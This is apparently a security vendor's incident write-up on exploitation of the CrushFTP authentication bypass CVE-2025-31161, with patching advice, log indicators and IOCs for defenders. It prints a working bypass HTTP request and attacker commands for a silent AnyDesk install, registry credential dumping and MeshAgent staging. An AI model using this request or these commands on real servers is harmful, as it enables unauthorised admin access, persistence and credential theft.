TL;DR: CVE-2025-31161 is a critical severity vulnerability allowing attackers to control how user authentication is handled by CrushFTP managed file transfer (MFT) software. We strongly recommend patching immediately to avoid affected versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. Successful exploitation of CVE-2025-31161 would give attackers admin level access across the CrushFTP application for further compromise. This blog outlines our re-created proof-of-concept for CVE-2025-31161 and attackers’ use of both legitimate and malicious RMM tooling for post-exploitation activities.
Special thanks to Tim Kasper, Faith Stratton, Jose Oregon, Matt Anderson, Craig Sweeney, Alden Schmidt, Lindsey Welch, Harlan Carvey, Jamie Levy, and John Hammond for their contributions and support for this analysis.
On 3 April 2025, Huntress observed in-the-wild exploitation of CVE-2025-31161, an authentication bypass vulnerability in versions of the CrushFTP software. We uncovered further post-exploitation activity leveraging the MeshCentral agent and other malware that we will discuss in this writeup. While doing some further analysis, we uncovered potential evidence of compromise as early as 30 March 2025, which seemed to be testing access, and did not spawn any external processes to CrushFTP.
In a recent post from the ShadowServer team, they state as of March 30 there were ~1,500 vulnerable instances of CrushFTP publicly exposed to the internet.
Figure 1: Tweet from Shadowserver Foundation on March 31, 2025
CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication. At the time of writing, the NIST NVD entry states the description:
CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass. Remote and unauthenticated HTTP requests to CrushFTP with known usernames can be used to impersonate a user and conduct actions on their behalf, including administrative actions and data retrieval.
This vulnerability is patched and is mitigated in CrushFTP versions 11.3.1+ and 10.8.4+. Huntress has validated and confirmed the authentication bypass is prevented in patched versions.
Please ensure your own installations of CrushFTP are updated to the latest versions. If your CrushFTP instance is publicly exposed to the open Internet, we strongly recommend you patch immediately.
Upon successful exploitation, an adversary may gain access to the administrator user account for the CrushFTP application, and leverage this to create new backdoor accounts, access files (upload and download), obtain code execution, and achieve full control of the vulnerable server.
The vulnerability was assigned a CVE on March 26, and the Shadowserver Foundation first reported CVE-2025-31161 exploitation activity on March 31. The exploitation of CVE-2025-31161 is indicative of a concerning trend that we’ve seen across several incidents, where threat actors are targeting MFT platforms as a way to deliver disruptive attacks. These platforms are typically external-facing and house sensitive enterprise data, making them a favorite for threat actors. As such, prompt patching is critical. Within our partner base we have seen 148 unique endpoints with the CrushFTP software installed as a service, with 95 of these running major versions 10 and 11. Approximately 72 different companies within our customer base were currently running unpatched versions of CrushFTP. Customers have been notified of the urgency to upgrade.
Numerous other security firms have discussed CVE-2025-31161 (hat tip to Rapid7 AttackerKB and Outpost24 amongst others) and thanks to their shared insights, Huntress was able to recreate a proof-of-concept (PoC) with ease. The core of this vulnerability is the S3 authentication functionality included as a part of CrushFTP. Due to logic bugs in the underlying source code (which Project Discovery did a fantastic job outlining), a mere Authorization header in an HTTP request is all that is needed to bypass authentication without valid username or password credentials.
Since the technical details of the proof of concept are already public and available, we have no concerns discussing the inner workings of our recreated proof-of-concept.
As stated, it boils down to just an HTTP request:
GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111 HTTP/1.1
Cookie: CrushAuth=1111111111_111111111111111111111111111111111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
Connection: close
While this is a simple example to merely list users on the CrushFTP instance, it demonstrates the key components:
Backend functions are accessible and any administrative actions can be performed
A single cookie, CrushAuth must be provided
This does not have to be a valid CrushAuth cookie. The Project Discovery writeup discusses the typical structure of this value, but we have seen success with just a ~31 character string of alphanumeric characters.
The c2f HTTP parameter must match the last 4 values of the CrushAuth cookie.
The Authorization header relies on the specific string prefix AWS4-HMAC-SHA256, and the Credential field may be set to any valid CrushFTP user account name that does not include a tilde (~), followed by a forward slash (/).
You will most commonly see the username crushadmin as this is the typical default administrator for CrushFTP servers.
In testing, we observed the CrushAuth cookie must still be “known” to the CrushFTP instance -- so a second HTTP request may be necessary if a random/invalid value is forged.
This small proof-of-concept only demonstrates the web-based authentication bypass… further actions and exploitation would be expanded upon by the adversary. In the following sections, we will discuss the tradecraft and post-exploitation used by the threat actors leveraging this vulnerability in the wild.
Across our Huntress partner base, the CrushFTP software is most typically installed within its own program directory commonly placed at the root of a volume (i.e., C:\CrushFTP10 or C:\CrushFTP11, but seen at D:\, E:\, or other drive letters).
Inside of this directory is a CrushFTP.log file, which includes valuable information. In our testing, we used CrushFTP version 10.5.1_12. We have seen the CrushFTP.log file to be the most reliable source to determine the full running version number of the CrushFTP installation. As an example, you may see a log entry like the following:
SERVER|<TIMESTAMP>|Server Memory Stats: <......> :Version 10.5.1_12
If you are unsure of which CrushFTP installation version you are running, be sure to check this file. Additionally, you can review it for any signs of exploitation with some of the indicators we have observed below. These are the very few lines of logs we observed when testing the recreated authentication bypass referenced above:
ACCEPT|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:lookup:8080] Accepting connection from:
<ATTACKER-IP-ADDRESS>:<EPHEMERAL-PORT>
POST|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:crushadmin:<ATTACKER-IP-ADDRESS>] WROTE: *HTTP/1.1 200 OK*
Bear in mind, this is only a test of bypassing authentication to act as the crushadmin user -- follow-on exploitation may look very different. There is nuance in what artifacts may be found in the logs, depending on the requests made-- if you see activity including the AWS4-HMAC-SHA256 Credential=crushadmin/ string, be sure to look around the entry to make sure there is no reference to a currentAuth cookie value. The currentAuth cookie is included in legitimate login sessions and is not used for the authentication bypass technique.
Additionally, we have seen log files present in the \logs\session_logs directory that may include further details for your own analysis if you believe you may have been compromised.
Here is one occurrence where the threat actor created a new admin account to use as a persistent backdoor:
There are a few things to call out in the log excerpt above:
Note the first two lines, which match the pattern of our recreated PoC artifacts -- and the observed adversary IP address, 172.235.144[.]67.
They leverage the setUserItem function to craft a new user with specified properties. In this case, the backdoor account name is Eaion6Mz.
They change the new user’s password, likely so they could log in later with it.
One neat trick, they set the new user’s last_login time to 06/08/2023 03:04:22 PM in an effort to hide the account and make it look like it was last used years ago.
On another affected host, we observed the threat actor upload and stage the MeshCentral agent to be leveraged for continued remote access, persistence, and further post-exploitation. Other incidents leveraged AnyDesk and one included more bespoke malware.
We will discuss these in further details in the following sections.
Huntress has seen exploitation of CVE-2025-31161 across only four distinct hosts from four different companies. Three of these companies were hosted by the same MSP. The types of companies affected ranged from marketing, retail, and semiconductors. While there was only a small number of our customers that were affected, there are known to be 130,000 vulnerable instances left open and exposed to the Internet outside of our purview. Therefore the true impact of this vulnerability is still yet to be determined.
On one host, Huntress observed a threat actor installing a malicious AnyDesk RMM instance post-exploitation, before moving to dump the SAM and System registry hives in an effort to harvest credentials.
The host appeared to be running a vulnerable version of CrushFTP; threat actors used CrushFTPService.exe in order to then install AnyDesk. The following commands were observed setting the stage for the AnyDesk install:
cmd.exe /c "C:\windows\temp\msiinstall.exe --install "C:\windows\temp\Anydesk" --silent"
cmd.exe /c "echo licence_key123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --register-licence"
cmd.exe /c "echo Anydesk@123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --set-password"
Figure 2: Process detection for AnyDesk spawning from CrushFTPService.exe
Figure 3: Process detection for credential dumping with reg.exe
On some hosts, the threat actor was observed deploying MeshAgent as part of the post-exploitation activity. MeshAgent is provided by legitimate open source remote monitoring platform MeshCentral, and has previously been used by threat actors for various remote access functionalities, like sending commands, maintaining persistence, and more. The following commands were observed staging the MeshCentral Agent installation:
From the CrushFTP log from one endpoint:
Accepting connection from: 2.58.56.16:50860
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0)
Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 783*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *Priority: u=0*
READ: *command:openFile*
READ: *upload_path:/Windows/Temp/mesch.exe*
READ: *upload_size:3480944*
READ: *upload_id:cisqUUw66Yte*
READ: *start_resume_loc:0*
READ: *c2f:odaJ*
WROTE: *150 Opening BINARY data connection. Ready to write file /Windows/Temp/mesch.exe. S T O R*
WROTE: *HTTP/1.1 200 OK*
...
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:cisqUUw66Yte*
READ: *total_chunks:6*
READ: *total_bytes:3480944*
READ: *filePath:/Windows/Temp/mesch.exe*
READ: *lastModified:1743685342000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:3480944 bytes @ 1699K/sec. MD5=114c196c39c91575880a5012d06565b1*
WROTE: *226 Transfer complete. MD5=114c196c39c91575880a5012d06565b1 ("/Windows/Temp/mesch.exe" 3480944) STOR*
WROTE: *HTTP/1.1 200 OK*
WROTE: *Content-Length: 138*
WROTE: **
WROTE: *<?xml version="1.0" encoding="UTF-8"?>
<commandResult><response></response><md5>114c196c39c91575880a5012d06565b1</md5></commandResult>*
WROTE: *HTTP/1.1 200 OK*
Note the included use of a currentAuth cookie here -- this indicates the adversary had leveraged CVE-2025-31161 to bypass authentication, but then used their access to login with a legitimate session.
Once the file was on the endpoint, the following commands were observed via EDR telemetry:
C:\Windows\Temp\mesch.exe run
C:\Windows\Temp\mesch.exe b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5jb25uZWN0KCczNjg3Jyk7
C:\Windows\Temp\mesch.exe -fullinstall
The base64 string in the second command decodes to:
require('win-console').hide();require('win-dispatcher').connect('3530');
On other detected endpoints, the MeshAgent post-exploitation installation was identical to the above, but on another endpoint, the base64 string decoded to:
require('win-console').hide();require('win-dispatcher').connect('4204');
Soon after the MeshAgent was deployed, a console window was opened (see above), which then added a non-admin user (CrushUser) to the local administrators group:
Figure 4: Signals Showing Post-Exploitation Activities
Within this affected host’s CrushFTP.log file (notice the STOR command for uploading the malicious DLL):
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0)
Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:SE13PFVmTlq0*
READ: *total_chunks:6*
READ: *total_bytes:4358656*
READ: *filePath:/Windows/Temp/d3d11.dll*
READ: *lastModified:1743586788000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:4358656 bytes @ 2128K/sec. MD5=1ab5a915e306686a1c7bebd03563a977* WROTE: *226 Transfer complete. MD5=1ab5a915e306686a1c7bebd03563a977 ("/Windows/Temp/d3d11.dll" 4358656) STOR*
After MeshAgent’s installation, another DLL was pulled onto the host. While we didn’t observe execution of this DLL we can gain some high level insight from it. It’s a large C++ binary that is an implementation of the open source library TgBot. Unfortunately, at this time we weren’t able to recover the bot token used by this particular sample as it is likely stored in an external configuration file.
Figure 5: C++ Classes in DLL
In addition to the sample being unstripped, there was also PDB information included which is a useful pivot to find more associated samples:
Figure 6: PDB Information
This allowed us to find 3 more DLLs that are likely written by the same author, all of which were uploaded to VirusTotal within the last week.
85a1bfebf2a5973ebecd6e5a58c8fab18edfead2c1680ec1e9cce902924c347e
f7c8be827f3bd98b30c5a8d23c1af77f3d0324a9ebcd90104134fc1971751ff7
be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e
While the true intent of this sample still isn’t clear, it is likely that the threat actors are making use of a Telegram bot to collect telemetry from infected hosts. This analysis will be updated as more information becomes available.
Post-exploitation efforts are already thoroughly covered by Huntress detection rules. In response to these intrusions specifically, we crafted detectors to find child processes invoked underneath the CrushFTP service executable:
For community members not yet protected with Huntress, there are two Sigma rules available in the public SigmaHQ repository for:
Detecting “Remote Access Tool - MeshAgent Command Execution via MeshCentral”
Detecting “Remote Access Tool - AnyDesk Silent Installation”
If you think you could be impacted, abuse our trial to quickly discover anything shady left behind.
|
Indicator |
First Observed (YYYYMMDD) |
Description |
|
172.235.144[.]67 |
2025-04-03 |
Attacker IP Address |
|
2.58.56[.]16 |
2025-04-03 |
Attacker IP Address |
|
Eaion6Mz |
2025-04-03 |
Backdoor Account Name |
|
C:\Windows\Temp\d3d11.dll be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e |
2025-04-03 |
TgBot DLL |
|
C:\Windows\Temp\mesch.exe 9036c92c3ca73cb6ec2da25035322554319288fd2f6db906413011873ad7e281 |
2025-04-03 |
MeshAgent Installer Binary |
Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
